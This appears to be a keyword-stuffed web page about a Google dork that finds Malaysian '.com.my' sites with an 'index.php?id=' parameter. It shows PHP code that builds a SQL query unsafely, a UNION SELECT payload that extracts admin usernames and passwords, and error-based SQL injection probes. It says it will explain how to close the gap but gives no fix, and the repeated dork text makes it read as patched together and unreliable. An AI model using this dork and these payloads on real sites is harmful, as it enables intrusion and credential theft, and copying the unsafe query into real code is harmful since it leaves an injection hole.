Inurl - -.com.my Index.php Id

Vulnerable code example:

// index.php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $id";  // UNSAFE
$result = mysqli_query($conn, $query);

Exploit payload:

/index.php?id=123 UNION SELECT username, password FROM admin_users --

If your website appears in a search for inurl -.com.my index.php id, you have a potential security gap. Here is how to close it. inurl -.com.my index.php id

# Test for error-based SQLi
/index.php?id=123' 
/index.php?id=123 AND 1=1
/index.php?id=123 AND 1=2
Scroll to Top